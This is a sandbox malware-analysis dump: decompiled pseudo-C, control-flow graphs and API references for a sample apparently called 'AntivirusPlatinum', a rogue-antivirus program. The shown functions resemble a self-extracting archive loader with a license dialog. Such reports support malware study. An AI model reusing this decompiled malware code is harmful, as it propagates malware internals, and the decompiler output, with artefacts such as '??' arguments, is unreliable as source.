                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAutoClassCompleteFindHandleModuleNameProcVersionWindowlstrcmpi
                                                                                                                                                  • String ID: EDIT$SHAutoComplete$shlwapi.dll
                                                                                                                                                  • API String ID: 1963989359-1514112725
                                                                                                                                                  • Opcode ID: 061a7f006815cb5225704708e58f3b1d48e22e535db15eec59ec71c478efb3d3
                                                                                                                                                  • Instruction ID: cf58bb30e006859db208b778a9a0797c0316ea9abfae2e107aa60b4248c819fa
                                                                                                                                                  • Opcode Fuzzy Hash: 061a7f006815cb5225704708e58f3b1d48e22e535db15eec59ec71c478efb3d3
                                                                                                                                                  • Instruction Fuzzy Hash: 021186715003096BE7109B65AD45FEB3BBDAB45700F04803ABA05E21D0D7B8E565D66E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 964 40cb2b-40cb53 call 40309d 967 40cb73-40cb81 964->967 968 40cb55-40cb56 964->968 969 40cb83-40cb8c SendMessageA 967->969 970 40cb8e-40cb95 967->970 971 40cb66-40cb68 968->971 972 40cb58-40cb5d 968->972 969->970 976 40cba7-40cbf0 call 40ba36 GetDlgItem SendMessageA GetSysColor SendMessageA call 40bf99 970->976 977 40cb97-40cba1 SendDlgItemMessageA 970->977 975 40cc1e-40cc21 971->975 973 40cc12 972->973 974 40cb63-40cb64 972->974 979 40cc14-40cc15 EndDialog 973->979 974->971 978 40cb6d-40cb6e 974->978 976->973 985 40cbf2-40cc10 call 406d54 call 40a205 976->985 977->976 978->979 981 40cc1b-40cc1d 979->981 981->975 985->981
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E0040CB2B(void* __ecx, void* __edx, void* __esi, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				long _t11;
                                                                                                                                                  				long _t18;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				struct HWND__* _t32;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				struct HWND__* _t36;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  
                                                                                                                                                  				_t35 = __edx;
                                                                                                                                                  				_t36 = _a4;
                                                                                                                                                  				E0040309D(__edx, _t36, _a8, _a12, _a16, "LICENSEDLG", 0, 0); // executed
                                                                                                                                                  				_t9 = _a8 - 0x110;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					_t10 =  *0x4192d4; // 0x170247
                                                                                                                                                  					_t38 = SendMessageA;
                                                                                                                                                  					__eflags = _t10;
                                                                                                                                                  					if(_t10 != 0) {
                                                                                                                                                  						SendMessageA(_t36, 0x80, 1, _t10);
                                                                                                                                                  					}
                                                                                                                                                  					_t11 =  *0x4192d0; // 0x5d050a36
                                                                                                                                                  					__eflags = _t11;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						SendDlgItemMessageA(_t36, 0x66, 0x172, 0, _t11); // executed
                                                                                                                                                  					}
                                                                                                                                                  					E0040BA36(_t35, __eflags, _t36);
                                                                                                                                                  					_t32 = GetDlgItem(_t36, 0x65);
                                                                                                                                                  					SendMessageA(_t32, 0x435, 0, 0x10000);
                                                                                                                                                  					SendMessageA(_t32, 0x443, 0, GetSysColor(0xf));
                                                                                                                                                  					E0040BF99(_t35, _t38, _t36,  *0x41a818, 3);
                                                                                                                                                  					_t18 =  *0x41a820;
                                                                                                                                                  					__eflags = _t18;
                                                                                                                                                  					if(_t18 == 0) {
                                                                                                                                                  						L12:
                                                                                                                                                  						_push(1);
                                                                                                                                                  						L13:
                                                                                                                                                  						EndDialog(_t36, ??); // executed
                                                                                                                                                  						goto L14;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t34 =  *0x418ec8; // 0x0
                                                                                                                                                  						E00406D54(_t34,  *0x414c74, _t32, _t18);
                                                                                                                                                  						E0040A205( *0x41a820);
                                                                                                                                                  						L14:
                                                                                                                                                  						__eflags = 1;
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t9 != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t29 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t29 == 0) {
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t29 == 1) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}












                                                                                                                                                  0x0040cb2b
                                                                                                                                                  0x0040cb30
                                                                                                                                                  0x0040cb46
                                                                                                                                                  0x0040cb4e
                                                                                                                                                  0x0040cb53
                                                                                                                                                  0x0040cb73
                                                                                                                                                  0x0040cb79
                                                                                                                                                  0x0040cb7f
                                                                                                                                                  0x0040cb81
                                                                                                                                                  0x0040cb8c
                                                                                                                                                  0x0040cb8c
                                                                                                                                                  0x0040cb8e
                                                                                                                                                  0x0040cb93
                                                                                                                                                  0x0040cb95
                                                                                                                                                  0x0040cba1
                                                                                                                                                  0x0040cba1
                                                                                                                                                  0x0040cba8
                                                                                                                                                  0x0040cbbd
                                                                                                                                                  0x0040cbc5
                                                                                                                                                  0x0040cbd8
                                                                                                                                                  0x0040cbe3
                                                                                                                                                  0x0040cbe8
                                                                                                                                                  0x0040cbee
                                                                                                                                                  0x0040cbf0
                                                                                                                                                  0x0040cc12
                                                                                                                                                  0x0040cc12
                                                                                                                                                  0x0040cc14
                                                                                                                                                  0x0040cc15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cbf2
                                                                                                                                                  0x0040cbf2
                                                                                                                                                  0x0040cc00
                                                                                                                                                  0x0040cc0b
                                                                                                                                                  0x0040cc1b
                                                                                                                                                  0x0040cc1d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cc1d
                                                                                                                                                  0x0040cbf0
                                                                                                                                                  0x0040cb56
                                                                                                                                                  0x0040cb66
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cb66
                                                                                                                                                  0x0040cb5c
                                                                                                                                                  0x0040cb5d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cb64
                                                                                                                                                  0x0040cb6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cb6d
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageA.USER32(?,00000080,00000001,00170247), ref: 0040CB8C
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,00000172,00000000,5D050A36), ref: 0040CBA1
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040CBB0
                                                                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00010000), ref: 0040CBC5
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040CBC9
                                                                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,00000000), ref: 0040CBD8
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040CC15
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Item$ColorDialog
                                                                                                                                                  • String ID: LICENSEDLG
                                                                                                                                                  • API String ID: 1567230415-2177901306
                                                                                                                                                  • Opcode ID: 01760e1f4c38ce4e5e33aba2a4cd8c6bda376a24c8dc7a6e2c1aa10115963a11
                                                                                                                                                  • Instruction ID: 32aadb3c41ccaf98f700fdda87381be768b7f3295c14a38e3d64121b63e1e91d
                                                                                                                                                  • Opcode Fuzzy Hash: 01760e1f4c38ce4e5e33aba2a4cd8c6bda376a24c8dc7a6e2c1aa10115963a11
                                                                                                                                                  • Instruction Fuzzy Hash: CC21B071240209BEE6116F61EDC6FBB376DE745B84F008036FB01F50E0C6B99C61966D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 990 401ce5-401d18 call 401200 call 404fdc call 408eac 997 401d72-401d76 990->997 998 401d1a-401d2f 990->998 999 401de3-401de8 call 408d14 997->999 998->997 1000 401d31 998->1000 1004 401ded-401df1 999->1004 1002 401d33-401d3b 1000->1002 1003 401d3d-401d54 call 40568a 1000->1003 1002->997 1002->1003 1007 401d56-401d58 call 401b80 1003->1007 1009 401d78-401d86 1003->1009 1004->1007 1008 401df7-401e41 call 408dc6 call 408da4 call 408dc6 * 2 1004->1008 1012 401d5d 1007->1012 1035 401e43-401e6f call 4098f7 call 40b2a9 call 40325c 1008->1035 1036 401e74-401e7d 1008->1036 1014 401db3-401de0 call 402dbd 1009->1014 1015 401d88-401d9b call 402c96 1009->1015 1017 401d61 1012->1017 1014->999 1015->1014 1028 401d9d-401dae call 404f2e call 40343e 1015->1028 1021 401d63-401d66 call 40a205 1017->1021 1022 401d6b-401d6d 1017->1022 1021->1022 1026 40250c-402510 1022->1026 1028->1014 1035->1012 1038 401e83-401e86 1036->1038 1039 401e7f-401e81 1036->1039 1042 401e88-401e8b 1038->1042 1043 401e8d-401e93 1038->1043 1041 401e94-401ec3 call 408d14 1039->1041 1049 4023a1-4023da call 408dc6 call 408e05 1041->1049 1050 401ec9-401eca 1041->1050 1042->1039 1042->1043 1043->1041 1065 4023eb-40240f call 408e82 1049->1065 1074 4023dc-4023e6 call 408da4 1049->1074 1051 401f49-401f52 1050->1051 1052 401ecc-401ecf 1050->1052 1057 401f54 1051->1057 1058 401f5a-401fef call 408e05 * 2 call 408da4 call 408e05 * 2 call 408da4 * 2 call 408dc6 call 408e05 1051->1058 1052->1051 1055 401ed1-401ed2 1052->1055 1060 401f03-401f1b 1055->1060 1061 401ed4-401edc 1055->1061 1057->1058 1131 401ff1-402009 call 408e05 * 2 1058->1131 1132 40200b-40201d 1058->1132 1066 401f2c-401f2f 1060->1066 1067 401f1d-401f27 call 408e05 1060->1067 1064 401ee2-401efe call 408e05 1061->1064 1061->1065 1064->1065 1081 4024c1-4024cd 1065->1081 1082 402415-402431 1065->1082 1066->1065 1073 401f35-401f44 call 408dc6 1066->1073 1067->1066 1073->1065 1074->1065 1084 4024fa-402500 1081->1084 1085 4024cf 1081->1085 1082->1081 1087 402437-40243a 1082->1087 1093 402502-402505 call 40a205 1084->1093 1094 40250a 1084->1094 1088 4024d1-4024dd 1085->1088 1089 4024df-4024f8 call 4098f7 call 40b2a9 1085->1089 1091 40248a-4024a1 call 4098f7 call 40b2a9 call 404f2e 1087->1091 1092 40243c-402443 1087->1092 1088->1084 1088->1089 1112 4024a6-4024bc call 40325c 1089->1112 1091->1112 1092->1091 1098 402445-402466 call 40a7e9 call 404fdc call 4054ed 1092->1098 1093->1094 1094->1026 1123 40246a-402473 call 40574f 1098->1123 1112->1017 1129 402475 1123->1129 1130 402479-40247a 1123->1130 1129->1130 1130->1123 1133 40247c-402488 call 40a810 1130->1133 1136 402028-40207f call 401030 * 2 1131->1136 1132->1136 1137 40201f-402026 1132->1137 1133->1081 1133->1091 1146 402081 1136->1146 1147 402084-4020ba call 408e4a call 40db30 1136->1147 1137->1136 1146->1147 1152 4020c0-4020d8 1147->1152 1153 402147-40214a 1147->1153 1156 4020da 1152->1156 1157 4020dd-4020df 1152->1157 1154 402150-402159 1153->1154 1155 4021f2-4021fb 1153->1155 1158 4021e2-4021e4 1154->1158 1159 40215f-402181 call 4030db call 40a384 1154->1159 1160 4021fd-402209 call 408e4a 1155->1160 1161 40220e-40223b call 40def9 1155->1161 1156->1157 1157->1155 1162 4020e5-40210f call 401708 call 408e4a call 40a4e9 1157->1162 1163 4021eb-4021ed call 401c42 1158->1163 1180 4021b0-4021cc call 4030ec 1159->1180 1181 402183-4021ae call 40e1db call 40e115 CharToOemA 1159->1181 1160->1161 1173 402241-402274 call 408dc6 1161->1173 1174 402319-402353 call 408e82 1161->1174 1162->1155 1194 402115-402142 1162->1194 1163->1155 1186 40227b-402290 1173->1186 1174->1065 1189 402359-402360 1174->1189 1193 4021d1-4021d5 1180->1193 1181->1193 1191 402292-402296 1186->1191 1192 402308-402313 1186->1192 1195 402362-40236a call 40a5e2 1189->1195 1196 40236f-40239f call 40325c call 40dba8 call 4098f7 call 40b2a9 1189->1196 1200 4022b1-4022c2 1191->1200 1201 402298-4022ae call 408e05 call 40def9 1191->1201 1192->1174 1192->1186 1193->1163 1202 4021d7-4021e0 1193->1202 1194->1155 1195->1196 1196->1065 1204 4022c4 1200->1204 1205 4022c7-4022d0 1200->1205 1201->1200 1202->1163 1204->1205 1209 4022d2-4022d7 1205->1209 1210 4022f6-402305 1205->1210 1214 4022d9-4022f4 call 408da4 1209->1214 1210->1192 1214->1210
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E00401CE5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				CHAR* _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				intOrPtr* _v24;
                                                                                                                                                  				signed char _v25;
                                                                                                                                                  				signed char _v26;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                  				signed int _v56;
                                                                                                                                                  				char _v60;
                                                                                                                                                  				signed short _v64;
                                                                                                                                                  				signed char _v68;
                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                  				intOrPtr _v84;
                                                                                                                                                  				char _v88;
                                                                                                                                                  				char _v92;
                                                                                                                                                  				signed int _v104;
                                                                                                                                                  				char _v108;
                                                                                                                                                  				void _v128;
                                                                                                                                                  				char _v4224;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				intOrPtr _t269;
                                                                                                                                                  				signed int _t282;
                                                                                                                                                  				signed int _t284;
                                                                                                                                                  				signed int _t288;
                                                                                                                                                  				signed int _t294;
                                                                                                                                                  				signed int _t295;
                                                                                                                                                  				void* _t308;
                                                                                                                                                  				signed int _t309;
                                                                                                                                                  				signed int _t311;
                                                                                                                                                  				intOrPtr* _t315;
                                                                                                                                                  				signed int* _t335;
                                                                                                                                                  				signed short _t342;
                                                                                                                                                  				intOrPtr _t347;
                                                                                                                                                  				signed int _t358;
                                                                                                                                                  				intOrPtr _t359;
                                                                                                                                                  				void* _t361;
                                                                                                                                                  				signed char _t374;
                                                                                                                                                  				signed int _t375;
                                                                                                                                                  				signed int _t376;
                                                                                                                                                  				signed int _t382;
                                                                                                                                                  				void* _t394;
                                                                                                                                                  				signed int _t409;
                                                                                                                                                  				void* _t429;
                                                                                                                                                  				signed int _t432;
                                                                                                                                                  				void* _t440;
                                                                                                                                                  				signed short _t449;
                                                                                                                                                  				signed int _t452;
                                                                                                                                                  				signed int _t456;
                                                                                                                                                  				signed int _t465;
                                                                                                                                                  				signed int* _t475;
                                                                                                                                                  				signed int _t488;
                                                                                                                                                  				signed int _t490;
                                                                                                                                                  				signed int _t500;
                                                                                                                                                  				signed int _t514;
                                                                                                                                                  				signed int _t526;
                                                                                                                                                  				void* _t529;
                                                                                                                                                  				signed char* _t533;
                                                                                                                                                  				signed int* _t537;
                                                                                                                                                  				signed int _t539;
                                                                                                                                                  				void* _t541;
                                                                                                                                                  				signed int _t548;
                                                                                                                                                  				short* _t549;
                                                                                                                                                  				signed int _t552;
                                                                                                                                                  				signed short* _t555;
                                                                                                                                                  				signed int _t557;
                                                                                                                                                  				signed int _t559;
                                                                                                                                                  				intOrPtr* _t561;
                                                                                                                                                  				signed int _t563;
                                                                                                                                                  				signed int _t566;
                                                                                                                                                  				signed char* _t568;
                                                                                                                                                  				intOrPtr _t569;
                                                                                                                                                  				void* _t570;
                                                                                                                                                  				void* _t571;
                                                                                                                                                  				void* _t574;
                                                                                                                                                  				signed int _t578;
                                                                                                                                                  				signed int _t581;
                                                                                                                                                  
                                                                                                                                                  				_t526 = __edx;
                                                                                                                                                  				E00401200(0x107c);
                                                                                                                                                  				_t440 = __ecx; // executed
                                                                                                                                                  				_t269 = E00404FDC(__ecx, __edx); // executed
                                                                                                                                                  				 *((intOrPtr*)(__ecx + 0x6d78)) = _t269;
                                                                                                                                                  				 *(__ecx + 0x6d7c) = __edx;
                                                                                                                                                  				E00408EAC( &_v56, __ecx);
                                                                                                                                                  				if( *((char*)(__ecx + 0x6d90)) == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_v5 = 0;
                                                                                                                                                  					L15:
                                                                                                                                                  					E00408D14(_t440,  &_v56, 7); // executed
                                                                                                                                                  					__eflags = _v40;
                                                                                                                                                  					if(_v40 == 0) {
                                                                                                                                                  						L5:
                                                                                                                                                  						E00401B80(_t440, _t526);
                                                                                                                                                  						L6:
                                                                                                                                                  						_t581 = _v56;
                                                                                                                                                  						L7:
                                                                                                                                                  						if(_t581 != 0) {
                                                                                                                                                  							E0040A205(_v56);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					E00408DC6( &_v56, _t440 + 0x4680);
                                                                                                                                                  					E00408DA4( &_v56,  &_v26);
                                                                                                                                                  					_t533 = _t440 + 0x4688;
                                                                                                                                                  					 *(_t440 + 0x4684) = _v26 & 0x000000ff;
                                                                                                                                                  					E00408DC6( &_v56, _t533);
                                                                                                                                                  					_t555 = _t440 + 0x468a;
                                                                                                                                                  					E00408DC6( &_v56, _t555);
                                                                                                                                                  					_t449 =  *_t555 & 0x0000ffff;
                                                                                                                                                  					__eflags = _t449 - 7;
                                                                                                                                                  					if(_t449 >= 7) {
                                                                                                                                                  						_t282 =  *(_t440 + 0x4684);
                                                                                                                                                  						__eflags = _t282 - 0x75;
                                                                                                                                                  						if(_t282 != 0x75) {
                                                                                                                                                  							__eflags = _t282 - 0x73;
                                                                                                                                                  							if(_t282 != 0x73) {
                                                                                                                                                  								L22:
                                                                                                                                                  								_t284 = (_t449 & 0x0000ffff) - 7;
                                                                                                                                                  								__eflags = _t284;
                                                                                                                                                  								_push(_t284);
                                                                                                                                                  								L23:
                                                                                                                                                  								E00408D14(_t440,  &_v56);
                                                                                                                                                  								asm("cdq");
                                                                                                                                                  								asm("adc edx, [ebx+0x6d7c]");
                                                                                                                                                  								 *((intOrPtr*)(_t440 + 0x6d80)) = ( *_t555 & 0x0000ffff) +  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                  								_t288 =  *(_t440 + 0x4684);
                                                                                                                                                  								_t452 = _t288 - 0x73;
                                                                                                                                                  								__eflags = _t452;
                                                                                                                                                  								 *(_t440 + 0x6d84) = _t526;
                                                                                                                                                  								if(_t452 == 0) {
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									E00408DC6( &_v56, _t440 + 0x4698);
                                                                                                                                                  									E00408E05( &_v56, _t440 + 0x469c);
                                                                                                                                                  									__eflags =  *(_t440 + 0x4694) & 0x00000200;
                                                                                                                                                  									if(( *(_t440 + 0x4694) & 0x00000200) != 0) {
                                                                                                                                                  										E00408DA4( &_v56, _t440 + 0x46a0);
                                                                                                                                                  									}
                                                                                                                                                  									L76:
                                                                                                                                                  									_t294 = E00408E82( &_v56, 0);
                                                                                                                                                  									__eflags = _v5;
                                                                                                                                                  									_t456 =  *(_t440 + 0x4684);
                                                                                                                                                  									_t295 =  !_t294;
                                                                                                                                                  									 *(_t440 + 0x6d9a) = _t295;
                                                                                                                                                  									 *(_t440 + 0x4678) = _t456;
                                                                                                                                                  									if(_v5 == 0) {
                                                                                                                                                  										L87:
                                                                                                                                                  										__eflags =  *(_t440 + 0x6d84) -  *((intOrPtr*)(_t440 + 0x6d7c));
                                                                                                                                                  										if(__eflags > 0) {
                                                                                                                                                  											L91:
                                                                                                                                                  											_t557 = _v40;
                                                                                                                                                  											__eflags = _v56;
                                                                                                                                                  											if(_v56 != 0) {
                                                                                                                                                  												E0040A205(_v56);
                                                                                                                                                  											}
                                                                                                                                                  											return _t557;
                                                                                                                                                  										}
                                                                                                                                                  										if(__eflags < 0) {
                                                                                                                                                  											L90:
                                                                                                                                                  											E0040B2A9(_t440 + 0x17, E004098F7(0x68), "???");
                                                                                                                                                  											L86:
                                                                                                                                                  											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                  											E0040325C(0x414c7c, 3);
                                                                                                                                                  											__eflags = _v56;
                                                                                                                                                  											goto L7;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t440 + 0x6d80)) -  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                  										if( *((intOrPtr*)(_t440 + 0x6d80)) >  *((intOrPtr*)(_t440 + 0x6d78))) {
                                                                                                                                                  											goto L91;
                                                                                                                                                  										}
                                                                                                                                                  										goto L90;
                                                                                                                                                  									}
                                                                                                                                                  									_t529 = _v52 - _v40 + 8;
                                                                                                                                                  									 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _t529;
                                                                                                                                                  									asm("adc [ebx+0x6d84], edi");
                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t440 + 0x4680)) - _t295;
                                                                                                                                                  									if( *((intOrPtr*)(_t440 + 0x4680)) == _t295) {
                                                                                                                                                  										goto L87;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t456 - 0x7b;
                                                                                                                                                  									if(_t456 != 0x7b) {
                                                                                                                                                  										L85:
                                                                                                                                                  										E0040B2A9(_t440 + 0x17, E004098F7(0x70), _t440 + 0x17);
                                                                                                                                                  										E00404F2E(_t440);
                                                                                                                                                  										goto L86;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t440 + 0x5398) & 0x00000004;
                                                                                                                                                  									if(( *(_t440 + 0x5398) & 0x00000004) == 0) {
                                                                                                                                                  										goto L85;
                                                                                                                                                  									}
                                                                                                                                                  									E0040A7E9( &_v92, _t529, _t440);
                                                                                                                                                  									_t308 = E00404FDC(_t440, _t529);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t559 = 7;
                                                                                                                                                  									_t309 = _t308 - _t559;
                                                                                                                                                  									__eflags = _t309;
                                                                                                                                                  									asm("sbb edx, edi");
                                                                                                                                                  									_push(_t529);
                                                                                                                                                  									_push(_t309);
                                                                                                                                                  									E004054ED(_t440);
                                                                                                                                                  									_v5 = 1;
                                                                                                                                                  									do {
                                                                                                                                                  										_t311 = E0040574F(_t440);
                                                                                                                                                  										__eflags = _t311;
                                                                                                                                                  										if(_t311 != 0) {
                                                                                                                                                  											_v5 = 0;
                                                                                                                                                  										}
                                                                                                                                                  										_t559 = _t559 - 1;
                                                                                                                                                  										__eflags = _t559;
                                                                                                                                                  									} while (_t559 != 0);
                                                                                                                                                  									E0040A810( &_v92);
                                                                                                                                                  									__eflags = _v5;
                                                                                                                                                  									if(_v5 != 0) {
                                                                                                                                                  										goto L87;
                                                                                                                                                  									}
                                                                                                                                                  									goto L85;
                                                                                                                                                  								}
                                                                                                                                                  								_t465 = _t452 - 1;
                                                                                                                                                  								__eflags = _t465;
                                                                                                                                                  								if(_t465 == 0) {
                                                                                                                                                  									L33:
                                                                                                                                                  									__eflags = _t288 - 0x74;
                                                                                                                                                  									_t315 = _t440 + 0x46a8;
                                                                                                                                                  									if(_t288 != 0x74) {
                                                                                                                                                  										_t315 = _t440 + 0x53b8;
                                                                                                                                                  									}
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_v24 = _t315;
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_v64 = _t315 + 0xc;
                                                                                                                                                  									E00408E05( &_v56, _t315 + 0xc);
                                                                                                                                                  									_t561 = _v24;
                                                                                                                                                  									_t66 = _t561 + 0x10; // 0x10
                                                                                                                                                  									_v20 = _t66;
                                                                                                                                                  									E00408E05( &_v56, _t66);
                                                                                                                                                  									_t69 = _t561 + 0x14; // 0x14
                                                                                                                                                  									E00408DA4( &_v56, _t69);
                                                                                                                                                  									_t71 = _t561 + 0x18; // 0x18
                                                                                                                                                  									E00408E05( &_v56, _t71);
                                                                                                                                                  									_t73 = _t561 + 0x1c; // 0x1c
                                                                                                                                                  									_v60 = _t73;
                                                                                                                                                  									E00408E05( &_v56, _t73);
                                                                                                                                                  									_t76 = _t561 + 0x20; // 0x20
                                                                                                                                                  									E00408DA4( &_v56, _t76);
                                                                                                                                                  									_t78 = _t561 + 0x21; // 0x21
                                                                                                                                                  									E00408DA4( &_v56, _t78);
                                                                                                                                                  									_t80 = _t561 + 0x22; // 0x22
                                                                                                                                                  									_v12 = _t80;
                                                                                                                                                  									E00408DC6( &_v56, _t80);
                                                                                                                                                  									_t83 = _t561 + 0x24; // 0x24
                                                                                                                                                  									E00408E05( &_v56, _t83);
                                                                                                                                                  									_t85 = _t561 + 0x28; // 0x28
                                                                                                                                                  									_t537 = _t85;
                                                                                                                                                  									__eflags =  *(_t561 + 8) & 0x00000100;
                                                                                                                                                  									if(( *(_t561 + 8) & 0x00000100) == 0) {
                                                                                                                                                  										_t475 = _v20;
                                                                                                                                                  										 *_t537 =  *_t537 & 0x00000000;
                                                                                                                                                  										_t94 = _t561 + 0x2c; // 0x2c
                                                                                                                                                  										_t335 = _t94;
                                                                                                                                                  										 *_t335 =  *_t335 & 0x00000000;
                                                                                                                                                  										__eflags =  *_t475 - 0xffffffff;
                                                                                                                                                  										_v16 = _t335;
                                                                                                                                                  										if( *_t475 == 0xffffffff) {
                                                                                                                                                  											_t526 = 0x7fffffff;
                                                                                                                                                  											 *_t475 = 0x7fffffff;
                                                                                                                                                  											 *_t335 = 0x7fffffff;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										E00408E05( &_v56, _t537);
                                                                                                                                                  										_t90 = _t561 + 0x2c; // 0x2c
                                                                                                                                                  										_v16 = _t90;
                                                                                                                                                  										E00408E05( &_v56, _t90);
                                                                                                                                                  									}
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xcd8)) = E00401030( *_t537, 0, 0, 1) +  *_v64;
                                                                                                                                                  									asm("adc edx, edi");
                                                                                                                                                  									 *(_t561 + 0xcdc) = _t526;
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xce0)) = E00401030( *_v16, 0, 0, 1) +  *_v20;
                                                                                                                                                  									_t342 =  *_v12 & 0x0000ffff;
                                                                                                                                                  									asm("adc edx, edi");
                                                                                                                                                  									_t539 = 0xfff;
                                                                                                                                                  									 *(_t561 + 0xce4) = _t526;
                                                                                                                                                  									__eflags = _t342 - 0xfff;
                                                                                                                                                  									if(_t342 < 0xfff) {
                                                                                                                                                  										_t539 = _t342 & 0x0000ffff;
                                                                                                                                                  									}
                                                                                                                                                  									E00408E4A( &_v56,  &_v4224, _t539);
                                                                                                                                                  									_t107 = _t561 + 0x30; // 0x30
                                                                                                                                                  									 *((char*)(_t570 + _t539 - 0x107c)) = 0;
                                                                                                                                                  									_v16 = _t107;
                                                                                                                                                  									E0040DB30(_t107,  &_v4224, 0x400);
                                                                                                                                                  									_t347 =  *((intOrPtr*)(_t561 + 4));
                                                                                                                                                  									__eflags = _t347 - 0x7a;
                                                                                                                                                  									if(_t347 != 0x7a) {
                                                                                                                                                  										__eflags = _t347 - 0x74;
                                                                                                                                                  										if(_t347 == 0x74) {
                                                                                                                                                  											__eflags =  *(_t561 + 8) & 0x00000200;
                                                                                                                                                  											if(( *(_t561 + 8) & 0x00000200) == 0) {
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												 *((short*)(_t561 + 0x430)) = 0;
                                                                                                                                                  											} else {
                                                                                                                                                  												E004030DB( &_v88);
                                                                                                                                                  												_t394 = E0040A384( &_v88,  &_v4224);
                                                                                                                                                  												_t500 =  *_v12 & 0x0000ffff;
                                                                                                                                                  												_t132 = _t561 + 0x430; // 0x430
                                                                                                                                                  												_t549 = _t132;
                                                                                                                                                  												__eflags = _t394 - _t500;
                                                                                                                                                  												if(_t394 != _t500) {
                                                                                                                                                  													__eflags = _t500 - _t394 + 1;
                                                                                                                                                  													E004030EC( &_v88,  &_v4224, _t570 + _t394 + 1 - 0x107c, _t500 - _t394 + 1, _t549, 0x400);
                                                                                                                                                  												} else {
                                                                                                                                                  													E0040E1DB( &_v4224, _t549, 0x3ff);
